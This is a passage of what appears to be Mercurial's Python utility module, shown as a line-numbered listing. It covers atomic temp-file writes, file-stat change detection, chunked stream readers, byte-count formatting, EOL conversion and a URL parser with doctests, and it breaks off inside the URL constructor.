1984 1984 def _makefspathcacheentry(dir):
1985 1985 return dict((normcase(n), n) for n in os.listdir(dir))
1986 1986
1987 1987 seps = pycompat.ossep
1988 1988 if pycompat.osaltsep:
1989 1989 seps = seps + pycompat.osaltsep
1990 1990 # Protect backslashes (keeping the escaped result). This gets silly very quickly.
1991 1991 seps = seps.replace('\\', '\\\\')
1992 1992 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1993 1993 dir = os.path.normpath(root)
1994 1994 result = []
1995 1995 for part, sep in pattern.findall(name):
1996 1996 if sep:
1997 1997 result.append(sep)
1998 1998 continue
1999 1999
2000 2000 if dir not in _fspathcache:
2001 2001 _fspathcache[dir] = _makefspathcacheentry(dir)
2002 2002 contents = _fspathcache[dir]
2003 2003
2004 2004 found = contents.get(part)
2005 2005 if not found:
2006 2006 # retry "once per directory" per "dirstate.walk" which
2007 2007 # may take place for each patch of "hg qpush", for example
2008 2008 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2009 2009 found = contents.get(part)
2010 2010
2011 2011 result.append(found or part)
2012 2012 dir = os.path.join(dir, part)
2013 2013
2014 2014 return ''.join(result)
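# Illustrative sketch (paths hypothetical): on a case-insensitive
# filesystem whose working copy actually contains "Foo/Bar.txt", a
# normcased lookup recovers the on-disk spelling:
#
# fspath(b'foo/bar.txt', b'/repo') -> b'Foo/Bar.txt'
#
# Both arguments must already be normcased; per-directory listings are
# cached in _fspathcache, so repeated lookups avoid re-listing.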
2015 2015
2016 2016 def checknlink(testfile):
2017 2017 '''check whether hardlink count reporting works properly'''
2018 2018
2019 2019 # testfile may be open, so we need a separate file for checking to
2020 2020 # work around issue2543 (or testfile may get lost on Samba shares)
2021 2021 f1, f2, fp = None, None, None
2022 2022 try:
2023 2023 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2024 2024 suffix='1~', dir=os.path.dirname(testfile))
2025 2025 os.close(fd)
2026 2026 f2 = '%s2~' % f1[:-2]
2027 2027
2028 2028 oslink(f1, f2)
2029 2029 # nlinks() may behave differently for files on Windows shares if
2030 2030 # the file is open.
2031 2031 fp = posixfile(f2)
2032 2032 return nlinks(f2) > 1
2033 2033 except OSError:
2034 2034 return False
2035 2035 finally:
2036 2036 if fp is not None:
2037 2037 fp.close()
2038 2038 for f in (f1, f2):
2039 2039 try:
2040 2040 if f is not None:
2041 2041 os.unlink(f)
2042 2042 except OSError:
2043 2043 pass
2044 2044
2045 2045 def endswithsep(path):
2046 2046 '''Check path ends with os.sep or os.altsep.'''
2047 2047 return (path.endswith(pycompat.ossep)
2048 2048 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2049 2049
2050 2050 def splitpath(path):
2051 2051 '''Split path by os.sep.
2052 2052 Note that this function does not use os.altsep because it is
2053 2053 an alternative to a simple "xxx.split(os.sep)".
2054 2054 It is recommended to use os.path.normpath() before using this
2055 2055 function if needed.'''
2056 2056 return path.split(pycompat.ossep)
2057 2057
2058 2058 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2059 2059 """Create a temporary file with the same contents from name
2060 2060
2061 2061 The permission bits are copied from the original file.
2062 2062
2063 2063 If the temporary file is going to be truncated immediately, you
2064 2064 can use emptyok=True as an optimization.
2065 2065
2066 2066 Returns the name of the temporary file.
2067 2067 """
2068 2068 d, fn = os.path.split(name)
2069 2069 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2070 2070 os.close(fd)
2071 2071 # Temporary files are created with mode 0600, which is usually not
2072 2072 # what we want. If the original file already exists, just copy
2073 2073 # its mode. Otherwise, manually obey umask.
2074 2074 copymode(name, temp, createmode, enforcewritable)
2075 2075
2076 2076 if emptyok:
2077 2077 return temp
2078 2078 try:
2079 2079 try:
2080 2080 ifp = posixfile(name, "rb")
2081 2081 except IOError as inst:
2082 2082 if inst.errno == errno.ENOENT:
2083 2083 return temp
2084 2084 if not getattr(inst, 'filename', None):
2085 2085 inst.filename = name
2086 2086 raise
2087 2087 ofp = posixfile(temp, "wb")
2088 2088 for chunk in filechunkiter(ifp):
2089 2089 ofp.write(chunk)
2090 2090 ifp.close()
2091 2091 ofp.close()
2092 2092 except: # re-raises
2093 2093 try:
2094 2094 os.unlink(temp)
2095 2095 except OSError:
2096 2096 pass
2097 2097 raise
2098 2098 return temp
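# Illustrative sketch (path hypothetical): the copy is created in the
# same directory as the original, so a later rename() stays on one
# filesystem and remains atomic:
#
# temp = mktempcopy(b'/repo/.hg/dirstate')
# ... write replacement content to temp ...
# rename(temp, b'/repo/.hg/dirstate')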
2099 2099
2100 2100 class filestat(object):
2101 2101 """help to exactly detect change of a file
2102 2102
2103 2103 'stat' attribute is result of 'os.stat()' if specified 'path'
2104 2104 exists. Otherwise, it is None. This can avoid preparative
2105 2105 'exists()' examination on client side of this class.
2106 2106 """
2107 2107 def __init__(self, stat):
2108 2108 self.stat = stat
2109 2109
2110 2110 @classmethod
2111 2111 def frompath(cls, path):
2112 2112 try:
2113 2113 stat = os.stat(path)
2114 2114 except OSError as err:
2115 2115 if err.errno != errno.ENOENT:
2116 2116 raise
2117 2117 stat = None
2118 2118 return cls(stat)
2119 2119
2120 2120 @classmethod
2121 2121 def fromfp(cls, fp):
2122 2122 stat = os.fstat(fp.fileno())
2123 2123 return cls(stat)
2124 2124
2125 2125 __hash__ = object.__hash__
2126 2126
2127 2127 def __eq__(self, old):
2128 2128 try:
2129 2129 # if ambiguity between stat of new and old file is
2130 2130 # avoided, comparison of size, ctime and mtime is enough
2131 2131 # to exactly detect change of a file regardless of platform
2132 2132 return (self.stat.st_size == old.stat.st_size and
2133 2133 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2134 2134 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2135 2135 except AttributeError:
2136 2136 pass
2137 2137 try:
2138 2138 return self.stat is None and old.stat is None
2139 2139 except AttributeError:
2140 2140 return False
2141 2141
2142 2142 def isambig(self, old):
2143 2143 """Examine whether new (= self) stat is ambiguous against old one
2144 2144
2145 2145 "S[N]" below means stat of a file at N-th change:
2146 2146
2147 2147 - S[n-1].ctime < S[n].ctime: can detect change of a file
2148 2148 - S[n-1].ctime == S[n].ctime
2149 2149 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2150 2150 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2151 2151 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2152 2152 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2153 2153
2154 2154 Case (*2) above means that a file was changed twice or more within
2155 2155 the same second (= S[n-1].ctime), so comparison of timestamps
2156 2156 is ambiguous.
2157 2157
2158 2158 The basic idea to avoid such ambiguity is to "advance mtime by 1
2159 2159 second, if the timestamp is ambiguous".
2160 2160
2161 2161 But advancing mtime only in case (*2) doesn't work as
2162 2162 expected, because naturally advanced S[n].mtime in case (*1)
2163 2163 might be equal to manually advanced S[n-1 or earlier].mtime.
2164 2164
2165 2165 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2166 2166 treated as ambiguous regardless of mtime, to avoid overlooking
2167 2167 changes hidden by such colliding mtimes.
2168 2168
2169 2169 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2170 2170 S[n].mtime", even if size of a file isn't changed.
2171 2171 """
2172 2172 try:
2173 2173 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2174 2174 except AttributeError:
2175 2175 return False
2176 2176
2177 2177 def avoidambig(self, path, old):
2178 2178 """Change file stat of specified path to avoid ambiguity
2179 2179
2180 2180 'old' should be previous filestat of 'path'.
2181 2181
2182 2182 This skips avoiding ambiguity, if a process doesn't have
2183 2183 appropriate privileges for 'path'. This returns False in this
2184 2184 case.
2185 2185
2186 2186 Otherwise, this returns True, as "ambiguity is avoided".
2187 2187 """
2188 2188 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2189 2189 try:
2190 2190 os.utime(path, (advanced, advanced))
2191 2191 except OSError as inst:
2192 2192 if inst.errno == errno.EPERM:
2193 2193 # utime() on the file created by another user causes EPERM,
2194 2194 # if a process doesn't have appropriate privileges
2195 2195 return False
2196 2196 raise
2197 2197 return True
2198 2198
2199 2199 def __ne__(self, other):
2200 2200 return not self == other
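# Illustrative sketch of the ambiguity check above (file name
# hypothetical):
#
# old = filestat.frompath(b'data')
# ... b'data' may be rewritten here ...
# new = filestat.frompath(b'data')
# if new.isambig(old):
#     new.avoidambig(b'data', old) # bump mtime so caches are not fooled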
2201 2201
2202 2202 class atomictempfile(object):
2203 2203 '''writable file object that atomically updates a file
2204 2204
2205 2205 All writes will go to a temporary copy of the original file. Call
2206 2206 close() when you are done writing, and atomictempfile will rename
2207 2207 the temporary copy to the original name, making the changes
2208 2208 visible. If the object is destroyed without being closed, all your
2209 2209 writes are discarded.
2210 2210
2211 2211 The checkambig argument of the constructor is used with filestat, and
2212 2212 is useful only if the target file is guarded by a lock (e.g. repo.lock
2213 2213 or repo.wlock).
2214 2214 '''
2215 2215 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2216 2216 self.__name = name # permanent name
2217 2217 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2218 2218 createmode=createmode,
2219 2219 enforcewritable=('w' in mode))
2220 2220
2221 2221 self._fp = posixfile(self._tempname, mode)
2222 2222 self._checkambig = checkambig
2223 2223
2224 2224 # delegated methods
2225 2225 self.read = self._fp.read
2226 2226 self.write = self._fp.write
2227 2227 self.seek = self._fp.seek
2228 2228 self.tell = self._fp.tell
2229 2229 self.fileno = self._fp.fileno
2230 2230
2231 2231 def close(self):
2232 2232 if not self._fp.closed:
2233 2233 self._fp.close()
2234 2234 filename = localpath(self.__name)
2235 2235 oldstat = self._checkambig and filestat.frompath(filename)
2236 2236 if oldstat and oldstat.stat:
2237 2237 rename(self._tempname, filename)
2238 2238 newstat = filestat.frompath(filename)
2239 2239 if newstat.isambig(oldstat):
2240 2240 # stat of changed file is ambiguous to original one
2241 2241 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2242 2242 os.utime(filename, (advanced, advanced))
2243 2243 else:
2244 2244 rename(self._tempname, filename)
2245 2245
2246 2246 def discard(self):
2247 2247 if not self._fp.closed:
2248 2248 try:
2249 2249 os.unlink(self._tempname)
2250 2250 except OSError:
2251 2251 pass
2252 2252 self._fp.close()
2253 2253
2254 2254 def __del__(self):
2255 2255 if safehasattr(self, '_fp'): # constructor actually did something
2256 2256 self.discard()
2257 2257
2258 2258 def __enter__(self):
2259 2259 return self
2260 2260
2261 2261 def __exit__(self, exctype, excvalue, traceback):
2262 2262 if exctype is not None:
2263 2263 self.discard()
2264 2264 else:
2265 2265 self.close()
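# Illustrative sketch of an all-or-nothing rewrite (file name
# hypothetical):
#
# with atomictempfile(b'config', mode='wb', checkambig=True) as fp:
#     fp.write(b'[ui]\nusername = alice\n')
#
# On normal exit the temporary file is renamed over b'config'; if the
# block raises, the temporary file is discarded and b'config' is untouched.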
2266 2266
2267 2267 def unlinkpath(f, ignoremissing=False, rmdir=True):
2268 2268 """unlink and remove the directory if it is empty"""
2269 2269 if ignoremissing:
2270 2270 tryunlink(f)
2271 2271 else:
2272 2272 unlink(f)
2273 2273 if rmdir:
2274 2274 # try removing directories that might now be empty
2275 2275 try:
2276 2276 removedirs(os.path.dirname(f))
2277 2277 except OSError:
2278 2278 pass
2279 2279
2280 2280 def tryunlink(f):
2281 2281 """Attempt to remove a file, ignoring ENOENT errors."""
2282 2282 try:
2283 2283 unlink(f)
2284 2284 except OSError as e:
2285 2285 if e.errno != errno.ENOENT:
2286 2286 raise
2287 2287
2288 2288 def makedirs(name, mode=None, notindexed=False):
2289 2289 """recursive directory creation with parent mode inheritance
2290 2290
2291 2291 Newly created directories are marked as "not to be indexed by
2292 2292 the content indexing service", if ``notindexed`` is specified
2293 2293 for "write" mode access.
2294 2294 """
2295 2295 try:
2296 2296 makedir(name, notindexed)
2297 2297 except OSError as err:
2298 2298 if err.errno == errno.EEXIST:
2299 2299 return
2300 2300 if err.errno != errno.ENOENT or not name:
2301 2301 raise
2302 2302 parent = os.path.dirname(os.path.abspath(name))
2303 2303 if parent == name:
2304 2304 raise
2305 2305 makedirs(parent, mode, notindexed)
2306 2306 try:
2307 2307 makedir(name, notindexed)
2308 2308 except OSError as err:
2309 2309 # Catch EEXIST to handle races
2310 2310 if err.errno == errno.EEXIST:
2311 2311 return
2312 2312 raise
2313 2313 if mode is not None:
2314 2314 os.chmod(name, mode)
2315 2315
2316 2316 def readfile(path):
2317 2317 with open(path, 'rb') as fp:
2318 2318 return fp.read()
2319 2319
2320 2320 def writefile(path, text):
2321 2321 with open(path, 'wb') as fp:
2322 2322 fp.write(text)
2323 2323
2324 2324 def appendfile(path, text):
2325 2325 with open(path, 'ab') as fp:
2326 2326 fp.write(text)
2327 2327
2328 2328 class chunkbuffer(object):
2329 2329 """Allow arbitrary sized chunks of data to be efficiently read from an
2330 2330 iterator over chunks of arbitrary size."""
2331 2331
2332 2332 def __init__(self, in_iter):
2333 2333 """in_iter is the iterator that's iterating over the input chunks."""
2334 2334 def splitbig(chunks):
2335 2335 for chunk in chunks:
2336 2336 if len(chunk) > 2**20:
2337 2337 pos = 0
2338 2338 while pos < len(chunk):
2339 2339 end = pos + 2 ** 18
2340 2340 yield chunk[pos:end]
2341 2341 pos = end
2342 2342 else:
2343 2343 yield chunk
2344 2344 self.iter = splitbig(in_iter)
2345 2345 self._queue = collections.deque()
2346 2346 self._chunkoffset = 0
2347 2347
2348 2348 def read(self, l=None):
2349 2349 """Read L bytes of data from the iterator of chunks of data.
2350 2350 Returns less than L bytes if the iterator runs dry.
2351 2351
2352 2352 If the size parameter is omitted, read everything."""
2353 2353 if l is None:
2354 2354 return ''.join(self.iter)
2355 2355
2356 2356 left = l
2357 2357 buf = []
2358 2358 queue = self._queue
2359 2359 while left > 0:
2360 2360 # refill the queue
2361 2361 if not queue:
2362 2362 target = 2**18
2363 2363 for chunk in self.iter:
2364 2364 queue.append(chunk)
2365 2365 target -= len(chunk)
2366 2366 if target <= 0:
2367 2367 break
2368 2368 if not queue:
2369 2369 break
2370 2370
2371 2371 # The easy way to do this would be to queue.popleft(), modify the
2372 2372 # chunk (if necessary), then queue.appendleft(). However, for cases
2373 2373 # where we read partial chunk content, this incurs 2 dequeue
2374 2374 # mutations and creates a new str for the remaining chunk in the
2375 2375 # queue. Our code below avoids this overhead.
2376 2376
2377 2377 chunk = queue[0]
2378 2378 chunkl = len(chunk)
2379 2379 offset = self._chunkoffset
2380 2380
2381 2381 # Use full chunk.
2382 2382 if offset == 0 and left >= chunkl:
2383 2383 left -= chunkl
2384 2384 queue.popleft()
2385 2385 buf.append(chunk)
2386 2386 # self._chunkoffset remains at 0.
2387 2387 continue
2388 2388
2389 2389 chunkremaining = chunkl - offset
2390 2390
2391 2391 # Use all of unconsumed part of chunk.
2392 2392 if left >= chunkremaining:
2393 2393 left -= chunkremaining
2394 2394 queue.popleft()
2395 2395 # offset == 0 is enabled by block above, so this won't merely
2396 2396 # copy via ``chunk[0:]``.
2397 2397 buf.append(chunk[offset:])
2398 2398 self._chunkoffset = 0
2399 2399
2400 2400 # Partial chunk needed.
2401 2401 else:
2402 2402 buf.append(chunk[offset:offset + left])
2403 2403 self._chunkoffset += left
2404 2404 left -= chunkremaining
2405 2405
2406 2406 return ''.join(buf)
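# Illustrative sketch: fixed-size reads over arbitrarily sized input
# chunks:
#
# >>> buf = chunkbuffer(iter([b'ab', b'cdef', b'g']))
# >>> buf.read(3)
# 'abc'
# >>> buf.read(3)
# 'def'
# >>> buf.read(3) # iterator ran dry: short read
# 'g'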
2407 2407
2408 2408 def filechunkiter(f, size=131072, limit=None):
2409 2409 """Create a generator that produces the data in the file size
2410 2410 (default 131072) bytes at a time, up to optional limit (default is
2411 2411 to read all data). Chunks may be less than size bytes if the
2412 2412 chunk is the last chunk in the file, or the file is a socket or
2413 2413 some other type of file that sometimes reads less data than is
2414 2414 requested."""
2415 2415 assert size >= 0
2416 2416 assert limit is None or limit >= 0
2417 2417 while True:
2418 2418 if limit is None:
2419 2419 nbytes = size
2420 2420 else:
2421 2421 nbytes = min(limit, size)
2422 2422 s = nbytes and f.read(nbytes)
2423 2423 if not s:
2424 2424 break
2425 2425 if limit:
2426 2426 limit -= len(s)
2427 2427 yield s
2428 2428
2429 2429 class cappedreader(object):
2430 2430 """A file object proxy that allows reading up to N bytes.
2431 2431
2432 2432 Given a source file object, instances of this type allow reading up to
2433 2433 N bytes from that source file object. Attempts to read past the allowed
2434 2434 limit are treated as EOF.
2435 2435
2436 2436 It is assumed that I/O is not performed on the original file object
2437 2437 in addition to I/O that is performed by this instance. If there is,
2438 2438 state tracking will get out of sync and unexpected results will ensue.
2439 2439 """
2440 2440 def __init__(self, fh, limit):
2441 2441 """Allow reading up to <limit> bytes from <fh>."""
2442 2442 self._fh = fh
2443 2443 self._left = limit
2444 2444
2445 2445 def read(self, n=-1):
2446 2446 if not self._left:
2447 2447 return b''
2448 2448
2449 2449 if n < 0:
2450 2450 n = self._left
2451 2451
2452 2452 data = self._fh.read(min(n, self._left))
2453 2453 self._left -= len(data)
2454 2454 assert self._left >= 0
2455 2455
2456 2456 return data
2457 2457
2458 2458 def readinto(self, b):
2459 2459 res = self.read(len(b))
2460 2460 if res is None:
2461 2461 return None
2462 2462
2463 2463 b[0:len(res)] = res
2464 2464 return len(res)
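# Illustrative sketch: the cap behaves like end-of-file once reached:
#
# >>> import io
# >>> fh = cappedreader(io.BytesIO(b'hello world'), 5)
# >>> fh.read()
# 'hello'
# >>> fh.read(3)
# ''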
2465 2465
2466 2466 def unitcountfn(*unittable):
2467 2467 '''return a function that renders a readable count of some quantity'''
2468 2468
2469 2469 def go(count):
2470 2470 for multiplier, divisor, format in unittable:
2471 2471 if abs(count) >= divisor * multiplier:
2472 2472 return format % (count / float(divisor))
2473 2473 return unittable[-1][2] % count
2474 2474
2475 2475 return go
2476 2476
2477 2477 def processlinerange(fromline, toline):
2478 2478 """Check that linerange <fromline>:<toline> makes sense and return a
2479 2479 0-based range.
2480 2480
2481 2481 >>> processlinerange(10, 20)
2482 2482 (9, 20)
2483 2483 >>> processlinerange(2, 1)
2484 2484 Traceback (most recent call last):
2485 2485 ...
2486 2486 ParseError: line range must be positive
2487 2487 >>> processlinerange(0, 5)
2488 2488 Traceback (most recent call last):
2489 2489 ...
2490 2490 ParseError: fromline must be strictly positive
2491 2491 """
2492 2492 if toline - fromline < 0:
2493 2493 raise error.ParseError(_("line range must be positive"))
2494 2494 if fromline < 1:
2495 2495 raise error.ParseError(_("fromline must be strictly positive"))
2496 2496 return fromline - 1, toline
2497 2497
2498 2498 bytecount = unitcountfn(
2499 2499 (100, 1 << 30, _('%.0f GB')),
2500 2500 (10, 1 << 30, _('%.1f GB')),
2501 2501 (1, 1 << 30, _('%.2f GB')),
2502 2502 (100, 1 << 20, _('%.0f MB')),
2503 2503 (10, 1 << 20, _('%.1f MB')),
2504 2504 (1, 1 << 20, _('%.2f MB')),
2505 2505 (100, 1 << 10, _('%.0f KB')),
2506 2506 (10, 1 << 10, _('%.1f KB')),
2507 2507 (1, 1 << 10, _('%.2f KB')),
2508 2508 (1, 1, _('%.0f bytes')),
2509 2509 )
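# Illustrative sketch: the table above is scanned top-down and the first
# threshold the value reaches wins:
#
# >>> bytecount(1)
# '1 bytes'
# >>> bytecount(1536)
# '1.50 KB'
# >>> bytecount(150 * 2**20)
# '150 MB'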
2510 2510
2511 2511 class transformingwriter(object):
2512 2512 """Writable file wrapper to transform data by function"""
2513 2513
2514 2514 def __init__(self, fp, encode):
2515 2515 self._fp = fp
2516 2516 self._encode = encode
2517 2517
2518 2518 def close(self):
2519 2519 self._fp.close()
2520 2520
2521 2521 def flush(self):
2522 2522 self._fp.flush()
2523 2523
2524 2524 def write(self, data):
2525 2525 return self._fp.write(self._encode(data))
2526 2526
2527 2527 # Matches a single EOL which can either be a CRLF where repeated CR
2528 2528 # are removed or a LF. We do not care about old Macintosh files, so a
2529 2529 # stray CR is an error.
2530 2530 _eolre = remod.compile(br'\r*\n')
2531 2531
2532 2532 def tolf(s):
2533 2533 return _eolre.sub('\n', s)
2534 2534
2535 2535 def tocrlf(s):
2536 2536 return _eolre.sub('\r\n', s)
2537 2537
2538 2538 def _crlfwriter(fp):
2539 2539 return transformingwriter(fp, tocrlf)
2540 2540
2541 2541 if pycompat.oslinesep == '\r\n':
2542 2542 tonativeeol = tocrlf
2543 2543 fromnativeeol = tolf
2544 2544 nativeeolwriter = _crlfwriter
2545 2545 else:
2546 2546 tonativeeol = pycompat.identity
2547 2547 fromnativeeol = pycompat.identity
2548 2548 nativeeolwriter = pycompat.identity
2549 2549
2550 2550 if (pyplatform.python_implementation() == 'CPython' and
2551 2551 sys.version_info < (3, 0)):
2552 2552 # There is an issue in CPython that some IO methods do not handle EINTR
2553 2553 # correctly. The following table shows what CPython version (and functions)
2554 2554 # are affected (buggy: has the EINTR bug, okay: otherwise):
2555 2555 #
2556 2556 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2557 2557 # --------------------------------------------------
2558 2558 # fp.__iter__ | buggy | buggy | okay
2559 2559 # fp.read* | buggy | okay [1] | okay
2560 2560 #
2561 2561 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2562 2562 #
2563 2563 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2564 2564 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2565 2565 #
2566 2566 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2567 2567 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2568 2568 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2569 2569 # fp.__iter__ but not other fp.read* methods.
2570 2570 #
2571 2571 # On modern systems like Linux, the "read" syscall cannot be interrupted
2572 2572 # when reading "fast" files like on-disk files. So the EINTR issue only
2573 2573 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2574 2574 # files approximately as "fast" files and use the fast (unsafe) code path,
2575 2575 # to minimize the performance impact.
2576 2576 if sys.version_info >= (2, 7, 4):
2577 2577 # fp.readline deals with EINTR correctly, use it as a workaround.
2578 2578 def _safeiterfile(fp):
2579 2579 return iter(fp.readline, '')
2580 2580 else:
2581 2581 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2582 2582 # note: this may block longer than necessary because of bufsize.
2583 2583 def _safeiterfile(fp, bufsize=4096):
2584 2584 fd = fp.fileno()
2585 2585 line = ''
2586 2586 while True:
2587 2587 try:
2588 2588 buf = os.read(fd, bufsize)
2589 2589 except OSError as ex:
2590 2590 # os.read only raises EINTR before any data is read
2591 2591 if ex.errno == errno.EINTR:
2592 2592 continue
2593 2593 else:
2594 2594 raise
2595 2595 line += buf
2596 2596 if '\n' in buf:
2597 2597 splitted = line.splitlines(True)
2598 2598 line = ''
2599 2599 for l in splitted:
2600 2600 if l[-1] == '\n':
2601 2601 yield l
2602 2602 else:
2603 2603 line = l
2604 2604 if not buf:
2605 2605 break
2606 2606 if line:
2607 2607 yield line
2608 2608
2609 2609 def iterfile(fp):
2610 2610 fastpath = True
2611 2611 if type(fp) is file:
2612 2612 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2613 2613 if fastpath:
2614 2614 return fp
2615 2615 else:
2616 2616 return _safeiterfile(fp)
2617 2617 else:
2618 2618 # PyPy and CPython 3 do not have the EINTR issue, thus no workaround is needed.
2619 2619 def iterfile(fp):
2620 2620 return fp
2621 2621
2622 2622 def iterlines(iterator):
2623 2623 for chunk in iterator:
2624 2624 for line in chunk.splitlines():
2625 2625 yield line
2626 2626
2627 2627 def expandpath(path):
2628 2628 return os.path.expanduser(os.path.expandvars(path))
2629 2629
2630 2630 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2631 2631 """Return the result of interpolating items in the mapping into string s.
2632 2632
2633 2633 prefix is a single character string, or a two character string with
2634 2634 a backslash as the first character if the prefix needs to be escaped in
2635 2635 a regular expression.
2636 2636
2637 2637 fn is an optional function that will be applied to the replacement text
2638 2638 just before replacement.
2639 2639
2640 2640 escape_prefix is an optional flag that allows using doubled prefix for
2641 2641 its escaping.
2642 2642 """
2643 2643 fn = fn or (lambda s: s)
2644 2644 patterns = '|'.join(mapping.keys())
2645 2645 if escape_prefix:
2646 2646 patterns += '|' + prefix
2647 2647 if len(prefix) > 1:
2648 2648 prefix_char = prefix[1:]
2649 2649 else:
2650 2650 prefix_char = prefix
2651 2651 mapping[prefix_char] = prefix_char
2652 2652 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2653 2653 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
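# Illustrative sketch: expanding %-prefixed placeholders, with '%%' as a
# literal escape when escape_prefix is enabled:
#
# >>> interpolate(b'%', {b'user': b'alice'}, b'hi %user')
# 'hi alice'
# >>> interpolate(b'%', {b'user': b'alice'}, b'100%% %user',
# ...             escape_prefix=True)
# '100% alice'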
2654 2654
2655 2655 def getport(port):
2656 2656 """Return the port for a given network service.
2657 2657
2658 2658 If port is an integer, it's returned as is. If it's a string, it's
2659 2659 looked up using socket.getservbyname(). If there's no matching
2660 2660 service, error.Abort is raised.
2661 2661 """
2662 2662 try:
2663 2663 return int(port)
2664 2664 except ValueError:
2665 2665 pass
2666 2666
2667 2667 try:
2668 2668 return socket.getservbyname(pycompat.sysstr(port))
2669 2669 except socket.error:
2670 2670 raise error.Abort(_("no port number associated with service '%s'")
2671 2671 % port)
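# Illustrative sketch:
#
# >>> getport(8080)
# 8080
# >>> getport(b'http') # resolved via socket.getservbyname
# 80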
2672 2672
2673 2673 class url(object):
2674 2674 r"""Reliable URL parser.
2675 2675
2676 2676 This parses URLs and provides attributes for the following
2677 2677 components:
2678 2678
2679 2679 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2680 2680
2681 2681 Missing components are set to None. The only exception is
2682 2682 fragment, which is set to '' if present but empty.
2683 2683
2684 2684 If parsefragment is False, fragment is included in query. If
2685 2685 parsequery is False, query is included in path. If both are
2686 2686 False, both fragment and query are included in path.
2687 2687
2688 2688 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2689 2689
2690 2690 Note that for backward compatibility reasons, bundle URLs do not
2691 2691 take host names. That means 'bundle://../' has a path of '../'.
2692 2692
2693 2693 Examples:
2694 2694
2695 2695 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2696 2696 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2697 2697 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2698 2698 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2699 2699 >>> url(b'file:///home/joe/repo')
2700 2700 <url scheme: 'file', path: '/home/joe/repo'>
2701 2701 >>> url(b'file:///c:/temp/foo/')
2702 2702 <url scheme: 'file', path: 'c:/temp/foo/'>
2703 2703 >>> url(b'bundle:foo')
2704 2704 <url scheme: 'bundle', path: 'foo'>
2705 2705 >>> url(b'bundle://../foo')
2706 2706 <url scheme: 'bundle', path: '../foo'>
2707 2707 >>> url(br'c:\foo\bar')
2708 2708 <url path: 'c:\\foo\\bar'>
2709 2709 >>> url(br'\\blah\blah\blah')
2710 2710 <url path: '\\\\blah\\blah\\blah'>
2711 2711 >>> url(br'\\blah\blah\blah#baz')
2712 2712 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2713 2713 >>> url(br'file:///C:\users\me')
2714 2714 <url scheme: 'file', path: 'C:\\users\\me'>
2715 2715
2716 2716 Authentication credentials:
2717 2717
2718 2718 >>> url(b'ssh://joe:xyz@x/repo')
2719 2719 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2720 2720 >>> url(b'ssh://joe@x/repo')
2721 2721 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2722 2722
2723 2723 Query strings and fragments:
2724 2724
2725 2725 >>> url(b'http://host/a?b#c')
2726 2726 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2727 2727 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2728 2728 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2729 2729
2730 2730 Empty path:
2731 2731
2732 2732 >>> url(b'')
2733 2733 <url path: ''>
2734 2734 >>> url(b'#a')
2735 2735 <url path: '', fragment: 'a'>
2736 2736 >>> url(b'http://host/')
2737 2737 <url scheme: 'http', host: 'host', path: ''>
2738 2738 >>> url(b'http://host/#a')
2739 2739 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2740 2740
2741 2741 Only scheme:
2742 2742
2743 2743 >>> url(b'http:')
2744 2744 <url scheme: 'http'>
2745 2745 """
2746 2746
2747 2747 _safechars = "!~*'()+"
2748 2748 _safepchars = "/!~*'()+:\\"
2749 2749 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2750 2750
2751 2751 def __init__(self, path, parsequery=True, parsefragment=True):
2752 2752 # We slowly chomp away at path until we have only the path left
2753 2753 self.scheme = self.user = self.passwd = self.host = None
2754 2754 self.port = self.path = self.query = self.fragment = None
2755 2755 self._localpath = True
2756 2756 self._hostport = ''
2757 2757 self._origpath = path
2758 2758
2759 2759 if parsefragment and '#' in path:
2760 2760 path, self.fragment = path.split('#', 1)
2761 2761
2762 2762 # special case for Windows drive letters and UNC paths
2763 2763 if hasdriveletter(path) or path.startswith('\\\\'):
2764 2764 self.path = path
2765 2765 return
2766 2766
2767 2767 # For compatibility reasons, we can't handle bundle paths as
2768 2768 # normal URLS
2769 2769 if path.startswith('bundle:'):
